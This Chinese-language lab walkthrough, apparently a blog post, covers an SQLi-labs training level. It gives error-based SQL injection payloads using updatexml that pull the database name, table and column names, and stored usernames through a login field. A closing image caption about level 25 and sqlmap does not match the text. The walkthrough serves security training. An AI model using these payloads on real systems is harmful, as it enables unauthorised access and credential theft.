目录
1:分析
经过我们的实验发现当我们输入的密码后面存在双引号时会报错,由此可以发现注入点在此处。
找闭合符:
当我们输入正确的账号并在后面加上#后,可以成功登录,由此我们可以使用#进行闭合。
2:开始注入
因为当我们输入的sql语句出错时web界面会将错误爆出来,所以我们可以使用报错注入的方式进行注入。
在账号输入栏进行注入。
报错注入:
注入数据库名:
admin" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#
注入表名:
admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
注入列名:
通过观察可以知道最有可能存放敏感信息的表为users表,所以我们将users表的信息注入出来。
admin " and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),0x7e),1) #
注入具体值:
我们已经注入出来了列名,现在我们将username和password注入出来。
admin" and updatexml(1,substr(concat(0x7e,(select group_concat(username) from users),0x7e),1,32),1)#
到此我们就成功的注入了,想要注入其他的值只需要重复上面的操作即可。
![<span style='color:red;'>Sqli</span>-<span style='color:red;'>labs</span><span style='color:red;'>靶场</span><span style='color:red;'>第</span>25<span style='color:red;'>关</span>[<span style='color:red;'>Sqli</span>-<span style='color:red;'>labs</span>-less-25]自动化注入-SQLmap工具注入](https://img-blog.csdnimg.cn/img_convert/e6b8d6d419504b24b0056ab07fb84e80.png)
